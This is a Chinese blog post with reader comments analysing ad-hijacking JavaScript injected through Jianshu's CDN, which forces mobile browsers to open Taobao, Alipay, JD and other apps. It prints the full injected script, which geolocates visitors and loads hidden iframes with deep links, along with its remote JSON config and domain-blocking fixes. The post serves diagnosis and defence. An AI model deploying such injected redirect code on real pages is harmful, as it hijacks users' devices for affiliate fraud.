每次手机上搜资料时,只要进入了简书,那么必定会跳转到各种app(淘宝、京东、天猫、京东金融等等),很烦的啊。
2020-02-02 更新:
在csdn、豆瓣上也发现这个问题。
我还以为是我本地宽带或者dns劫持,但是我本地dns用的是114和119,很少出现这种问题,而且简书也是https,浏览器也是绿标,
所以就usb chrome 远程调试看了下,不看不知道,居然会唤醒这么多app和跳转网页。
临时解决方案
屏蔽 ad.lflucky.com 这个域名(建议屏蔽这个域名下的所有二级域名),host改也行。
方法一: 手机端使用 火狐浏览器,安装 AdGuard 广告过滤插件,屏蔽 ad.lflucky.com
方法二、有位读者推荐的软件也很不错,AdGuard Home ,安装在软路由中使用~
2020-03-09:
广告代码改为https://jian.t58b.com/js/jan/jian.js
所以,继续屏蔽 jian.t58b.com。
最后想了下,既然是cdn劫持,那么我把cdn域名一刀切怎么样,别说,效果还蛮不错的,界面干净了。
屏蔽整个cdn下的js,不过这样带来的后果是文章不能动态加载出来,只适合偶尔使用简书。
cdn2.jianshu.io/*.js
手机端用yandex浏览器,装广告屏蔽插件,屏蔽 ad.lflucky.com 这个域名(建议屏蔽这个域名下的所有二级域名),我个人装的是广告终结者,本来想装uBlock的,懒得折腾就没装。
或者路由器ad插件屏蔽这个域名。
添加屏蔽域名后完美,终于不再跳转。
分析
因为我的前端是废的,所以也只能进行简单点的分析,大佬们看看就好了。
简单分析了一下跳转js,点击 VM2486:1 进入到js,格式化后的代码如下
(function() {
function getJson(a, b) {
var c = new XMLHttpRequest();
c.open("get", a);
c.send(null);
c.onreadystatechange = function() {
if (c.readyState == 4 && c.status == 200) {
b && b(eval("(" + c.responseText + ")"))
}
}
}
function ProductLink(a) {
this.product = a.productJson;
this.disabledArea = ["UNITED STATES", "JAPAN", "SINGAPORE", "CANADA", "香港", "北京", "上海"];
this.avokeTime = a.avokeTime
}
ProductLink.prototype.init = function() {
var b = this;
if (window.navigator.platform.indexOf("Win") > -1 || window.navigator.platform.indexOf("Mac") > -1) {} else {
this.isDisabled(function() {
var a = true;
try {
for (var i = 0; i < b.disabledArea.length; i++) {
if (returnCitySN["cname"].indexOf(b.disabledArea[i]) > -1) {
a = false;
break
}
}
} catch(e) {}
if (!a) {
return
}
b.addElement()
})
}
};
ProductLink.prototype.isDisabled = function(a) {
var b = document.createElement("script");
var c = false;
document.body.appendChild(b);
b.src = "https://pv.sohu.com/cityjson";
b.onload = function() {
if (!c) {
c = true;
a && a()
}
};
setTimeout(function() {
if (!c) {
c = true;
a && a()
}
},
4000)
};
ProductLink.prototype.addElement = function() {
var a = this;
setTimeout(function() {
a.showMainProject();
a.showSecondaryProduct()
},
2000)
};
ProductLink.prototype.showMainProject = function() {
this.showAllKind(this.product.mainProduct.appLink, this.product.mainProduct.cancelTime)
};
ProductLink.prototype.showSecondaryProduct = function() {
var b = this;
var c = this.product.secondaryProduct.concat();
var d = c.length;
var e = null;
e = setInterval(function() {
if (d <= 0) {
clearInterval(e);
return
}
var a = Math.floor(Math.random() * d);
b.showAllKind(c[a].appLink, c[a].cancelTime);
c.splice(a, 1);
d--
},
b.avokeTime * 1000)
};
ProductLink.prototype.showAllKind = function(a, b) {
var c = a.concat();
var d = c.length;
var e = false;
var f = this.getCurrentDate();
while (d > 0 && !e) {
var g = Math.floor(Math.random() * d);
if (c[g].type == "random") {
this.newIframe(c[g].link, b);
e = true
} else if (c[g].type == "date") {
if (c[g][f]) {
this.newIframe(c[g][f], b);
e = true
} else {
c.splice(g, 1);
d--
}
}
}
};
ProductLink.prototype.getCurrentDate = function() {
var a = new Date(),
Y = a.getFullYear() + "-",
M = (a.getMonth() + 1 < 10 ? "0" + (a.getMonth() + 1) : a.getMonth() + 1) + "-",
D = a.getDate() < 10 ? "0" + a.getDate() : a.getDate();
return Y + M + D
};
ProductLink.prototype.newIframe = function(b, c) {
var d = document.createElement("iframe");
d.style.display = "none";
d.src = b;
document.body.appendChild(d);
var e = document.createElement("iframe");
e.style.display = "none";
e.src = "./counturl.html?url=" + encodeURIComponent(b);
document.body.appendChild(e);
setTimeout((function(m, a) {
return function() {
document.body.removeChild(m);
document.body.removeChild(a)
}
})(d, e), c * 1000)
};
getJson("./json/product.json",
function(a) {
new ProductLink(a).init()
})
})();
嗯,上面有个getJson方法,搜索了下加载记录发现域名是:
https://ad.lflucky.com/janes/json/product.json(对应ip为:59.110.185.253)
阿里云的机器,很不错,考虑到个各种不同的宽带用户给予最佳的劫持体验。
Json内容如下(时间 2019-08-31 15:52 ):
{
"productJson": {
"mainProduct": {
"appName": "tb",
"appLink": [
{
"type": "random",
"link": "tbopen://m.taobao.com/tbopen/index.html?source=auto&action=ali.open.nav&module=h5&bootImage=0&spm=2014.ugdhh.4076930961.10016-1208-32768&bc_fl_src=growth_dhh_4076930961_10016-1208-32768&materialid=10016&h5Url=https://h5.m.taobao.com/bcec/dahanghai-jump.html?spm=2014.ugdhh.4076930961.10016-1208-32768&bc_fl_src=growth_dhh_4076930961_10016-1208-32768"
}
],
"cancelTime": 5
},
"secondaryProduct": [
{
"appName": "uc",
"appLink": [
{
"type": "date",
"2019-08-30": "uclink://www.uc.cn/cc77796ca7c25dff9607d31b29effc07?action=open_url&src_pkg=jixinhx&src_ch=jixinhx64&src_scene=pullup&url=ext:info_flow_open_channel:ch_id=100&insert_item_ids=17707084109410804287&type=multiple&from=6001",
"2019-08-31": "uclink://www.uc.cn/cc77796ca7c25dff9607d31b29effc07?action=open_url&src_pkg=jixinhx&src_ch=jixinhx64&src_scene=pullup&url=ext:info_flow_open_channel:ch_id=100&insert_item_ids=954127903094346666&type=multiple&from=6001",
"2019-09-01": "uclink://www.uc.cn/cc77796ca7c25dff9607d31b29effc07?action=open_url&src_pkg=jixinhx&src_ch=jixinhx64&src_scene=pullup&url=ext:info_flow_open_channel:ch_id=100&insert_item_ids=954127903094346666&type=multiple&from=6001",
"2019-09-02": "uclink://www.uc.cn/cc77796ca7c25dff9607d31b29effc07?action=open_url&src_pkg=jixinhx&src_ch=jixinhx64&src_scene=pullup&url=ext:info_flow_open_channel:ch_id=100&insert_item_ids=954127903094346666&type=multiple&from=6001",
"2019-09-03": "uclink://www.uc.cn/cc77796ca7c25dff9607d31b29effc07?action=open_url&src_pkg=jixinhx&src_ch=jixinhx64&src_scene=pullup&url=ext:info_flow_open_channel:ch_id=100&insert_item_ids=5414198177651951323&type=multiple&from=6001",
"2019-09-04": "uclink://www.uc.cn/cc77796ca7c25dff9607d31b29effc07?action=open_url&src_pkg=jixinhx&src_ch=jixinhx64&src_scene=pullup&url=ext:info_flow_open_channel:ch_id=100&insert_item_ids=5414198177651951323&type=multiple&from=6001",
"2019-09-05": "uclink://www.uc.cn/cc77796ca7c25dff9607d31b29effc07?action=open_url&src_pkg=jixinhx&src_ch=jixinhx64&src_scene=pullup&url=ext:info_flow_open_channel:ch_id=100&insert_item_ids=1692900910150652661&type=multiple&from=6001",
"2019-09-06": "uclink://www.uc.cn/cc77796ca7c25dff9607d31b29effc07?action=open_url&src_pkg=jixinhx&src_ch=jixinhx64&src_scene=pullup&url=ext:info_flow_open_channel:ch_id=100&insert_item_ids=1692900910150652661&type=multiple&from=6001"
}
],
"cancelTime": 5
},
{
"appName": "sjbd",
"appLink": [
{
"type": "random",
"link": "baiduboxapp://v1/easybrowse/open?url=https://dwz.cn/1VJnrokX?u=68a5251f61c446dd&needlog=1&logargs={"source":"1023217w","from":"openbox","page":"other","type":"","value":"url","channel":""}"
}
],
"cancelTime": 5
},
{
"appName": "yk",
"appLink": [
{
"type": "random",
"link": "youku://weex?source=00002184&url=https://t.youku.com/yep/page/m/sanfang1903_wmdt?wh_weex=true&isNeedBaseImage=1&refer=sanfang1903_operation.qrwang_00002184_000000_2qiMB3_19053000&refer=sanfang1903_operation.qrwang_00002184_000000_2qiMB3_19053000"
}
],
"cancelTime": 5
},
{
"appName": "wph",
"appLink": [
{
"type": "random",
"link": "vipshop://goHome?tra_from=tra:C01V4m1bc22uzug2::mig_code::ac010m4olsydie4ern10dr6k8vkne6bd"
}
],
"cancelTime": 5
},
{
"appName": "jdjr",
"appLink": [
{
"type": "random",
"link": "jdmobile://share?jumpType=8&jumpUrl=https://u.jd.com/Yxw5iX?channellv=hqtf1&channel=default&sourceUrl=1108*gt001"
}
],
"cancelTime": 5
},
{
"appName": "pdd",
"appLink": [
{
"type": "random",
"link": "pinduoduo://com.xunmeng.pinduoduo/duo_coupon_landing.html?goods_id=2338511&pid=8827514_107105089&cpsSign=CC_190820_8827514_107105089_49f497cee8712faf331724b17240bda9&duoduo_type=2"
}
],
"cancelTime": 5
},
{
"appName": "zfb",
"appLink": [
{
"type": "random",
"link": "alipays://platformapi/startapp?appClearTop=false&appId=20000067&startMultApp=YES&url=https://render.alipay.com/p/f/fd-jr8wq5v4/pages/inside/index.html?pid=2088231933430185&partnerid=fl01&__webview_options__=pd%3DNO%26ttb%3Dauto&enableWK=YES"
}
],
"cancelTime": 5
},
{
"appName": "jd",
"appLink": [
{
"type": "random",
"link": "openapp.jdmobile://virtual?params={\"category\":\"jump\",\"sourceType\":\"sourceType_test\",\"des\":\"m\",\"url\":\"https://u.jd.com/dRrNLl\",\"unionSource\":\"Awake\",\"channel\":\"cedad4c0ad02455c9a818f1b3d98da1a\",\"union_open\":\"union_cps\"}"
}
],
"cancelTime": 5
},
{
"appName": "jrtt",
"appLink": [
{
"type": "date",
"2019-08-30": "snssdk143://search?keyword=信息学奥赛取消+有学生集训数月&from=gs_ac_click_schema_lx26&growth_from=click_schema_lx26&pd=synthesis&source=click_schema_lx26&needlaunchlog=1&gd_label=click_schema_lx26",
"2019-08-31": "snssdk143://search?keyword=在家乡一口气买十套房?柳岩回应&from=gs_ac_click_schema_lx26&growth_from=click_schema_lx26&pd=synthesis&source=click_schema_lx26&needlaunchlog=1&gd_label=click_schema_lx26",
"2019-09-01": "snssdk143://search?keyword=国内首例克隆猫主人:花了25万&from=gs_ac_click_schema_lx26&growth_from=click_schema_lx26&pd=synthesis&source=click_schema_lx26&needlaunchlog=1&gd_label=click_schema_lx26",
"2019-09-02": "snssdk143://search?keyword=迪士尼不接受调解+坚持翻包检查&from=gs_ac_click_schema_lx26&growth_from=click_schema_lx26&pd=synthesis&source=click_schema_lx26&needlaunchlog=1&gd_label=click_schema_lx26",
"2019-09-03": "snssdk143://search?keyword=宠物医疗市场扩张+执业医师稀缺&from=gs_ac_click_schema_lx26&growth_from=click_schema_lx26&pd=synthesis&source=click_schema_lx26&needlaunchlog=1&gd_label=click_schema_lx26",
"2019-09-04": "snssdk143://search?keyword=游客坐路中央拍照交警提醒&from=gs_ac_click_schema_lx26&growth_from=click_schema_lx26&pd=synthesis&source=click_schema_lx26&needlaunchlog=1&gd_label=click_schema_lx26",
"2019-09-05": "snssdk143://search?keyword=天降垃圾砸车可起诉全楼&from=gs_ac_click_schema_lx26&growth_from=click_schema_lx26&pd=synthesis&source=click_schema_lx26&needlaunchlog=1&gd_label=click_schema_lx26",
"2019-09-06": "snssdk143://search?keyword=健身房承诺开泳池未兑现被投诉&from=gs_ac_click_schema_lx26&growth_from=click_schema_lx26&pd=synthesis&source=click_schema_lx26&needlaunchlog=1&gd_label=click_schema_lx26"
}
],
"cancelTime": 5
},
{
"appName": "douyin",
"appLink": [
{
"type": "date",
"2019-08-30": "snssdk1128://detail?id=6727796549604150532&gd_label=click_schema_lx5",
"2019-08-31": "snssdk1128://detail?id=6727793959982157063&gd_label=click_schema_lx5",
"2019-09-01": "snssdk1128://detail?id=6728772476395949320&gd_label=click_schema_lx5",
"2019-09-02": "snssdk1128://detail?id=6728647813158145291&gd_label=click_schema_lx5",
"2019-09-03": "snssdk1128://detail?id=6729018672242871556&gd_label=click_schema_lx5",
"2019-09-04": "snssdk1128://detail?id=6729044398245498124&gd_label=click_schema_lx5",
"2019-09-05": "snssdk1128://detail?id=6728696625901980931&gd_label=click_schema_lx5"
}
],
"cancelTime": 5
}
]
},
"avokeTime": 2
}
在 productJson.secondaryProduct 看出,总共会跳转以下几个app
- UC
- sjbk(不知道是啥)
- yk(优酷)
- wph(不知道是啥)
- jdjr(京东金融)
- pdd(拼多多)
- zfb(支付宝)
- jd(京东)
- jrtt(不知道是啥)
- douyin(抖音)
可以看出来是真的恶心,最恶心的是跳转到这些页面
https://mip.yemnn.cn/llq_5/p7069z.html https://m.685862.vip/2019llq_5/p7069z.html?20190901001245&t=1786766884&f=1&i=1
导致不能后退、强制下载app,而且又得看历史记录才能到原来浏览的地方。这个部分没有重现出来,后面补上。
然后继续往上走,发现这个域名第一次出现的地方是
https://cdn2.jianshu.io/asimov/2.0a635c573bb72b959d07.js,简书的cdn
同时访问搜狐的接口进行ip地域解析,根据用户所在地区进行不同的广告或者跳转app。
剩下的不用分析也知道了,只有几种可能
- 简书 官方自己搞得跳转代码
- 简书用的cdn服务商进行的劫持
- 运营商结合cdn服务商一起劫持
此时我这里 cdn2.jianshu.io 解析的ip为:163.177.20.232
而在ipip和17ce发现,解析到这个ip的地区是广州联通、加上我的地区,会发生劫持。
Yandex浏览器添加ad插件进行屏蔽
跳转到页面,待复现分析......
更新
由于我开启了ipv6,默认解析dns变成了运营商的ipv6,导致返回的ip和公共dns不一样,运营商+cdn运营商劫持?
openwrt居然不能指定ipv6的dns,dncp给客户端的v6居然是运营商的
而电脑手机会按照v6的dns进行解析,不按照设置的v4 dns解析。
根据ipip显示信息来看,是一家 天际友盟 广告联盟,而我好奇的是,这家公司是怎么拿到简书的ssl证书的?
手机浏览器还显示绿标
更新
在禁用ipv6后,我本地使用114和119解析还是被劫持的ip
手机端360极速浏览器可以设置禁止网页跳转APP
用360了,和裸奔没啥区别~
请问不让返回的代码是什么呀
sjbd=手机百度
我因为这个都不在手机点开简书;1,噗
wph=唯品会
jrtt=今日头条
make~
我也分析出来了 ad.lflucky.com 网址,除了简书 还有 豆瓣 ...都有劫持跳转app要慢慢分析了
csdn也是,貌似cdn投毒......
我用AdGuard Home放在路由器上,从此世界清净
我也试了一下,还是挺不错的~谢谢推荐 😀
手机知乎也是这样。
互联网毒瘤, 下个手机换苹果, 安卓没人权
这个没办法,国内环境不好,各种卖流量,其实用qq浏览器之类的也可以避免这种情况,但是用了国产浏览器后……你懂的……